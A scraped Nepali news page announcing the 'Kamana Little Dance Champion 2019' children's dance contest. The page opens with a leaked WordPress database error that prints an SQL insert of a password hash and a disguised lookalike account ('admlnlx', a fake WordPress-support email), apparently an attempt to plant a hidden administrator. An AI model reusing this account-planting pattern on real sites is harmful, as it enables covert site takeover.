WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bqfmz.pkGh0sEq1cjf97/SNsCfsSO..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 06:30:43', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २९ बैशाख, काठमाण्डौं । कामना कला केन्द्र नृत्य विद्यालयले “कामना लिटिल डान्स च्याम्पियन २०१९” आयोजना गर्ने भएको छ ।
“हाम्रो भावना, संरक्षित कला, संस्कृति र राष्ट्रियताको चाहना” नाराका साथ स्थापना भएको कामना कला केन्द्रले हिजो शनिबार अन्तरक्रिया तथा पत्रकार सम्मेलन गरि आफ्नो कार्यक्रम सावर्जिन गरेको हो ।
यहि जेष्ठ १२ गतेबाट सञ्चालन हुने “कामना लिटिल डान्स च्याम्पियन”मा कक्षा जि.पि.देखि कक्षा ४ सम्मका विद्यार्थीले प्रतिस्पर्दाको लागि सहभागिता जनाउन पाउने जनाएको छ ।
“कामना लिटिल च्याम्पियन” मा सहभागिताको लागि फर्म खुला गरिएको र फर्म शुल्क मात्र १०० राखिएको आयोजकले जनाएको छ ।